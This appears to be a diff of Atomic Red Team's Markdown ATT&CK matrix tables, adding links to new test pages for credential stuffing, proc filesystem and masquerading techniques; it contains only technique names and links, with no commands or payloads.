 | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -26,7 +26,7 @@
 |  | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Screen Capture](../../T1113/T1113.md) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Standard Port](../../T1571/T1571.md) |  |
 |  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -45,7 +45,7 @@
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [SSH Authorized Keys](../../T1098.004/T1098.004.md) |  | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Systemd Service](../../T1543.002/T1543.002.md) |  | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Systemd Timers](../../T1053.006/T1053.006.md) |  | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -4,7 +4,7 @@
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -39,7 +39,7 @@
 |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) |  |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Trap](../../T1546.005/T1546.005.md) |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) |  | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  |  | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
+|  |  | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  |  |  | [Obfuscated Files or Information](../../T1027/T1027.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -10,7 +10,7 @@
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -43,7 +43,7 @@
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) |  |  |  |  |  |  |
-|  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
+|  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) |  |  |  |  |  |  |
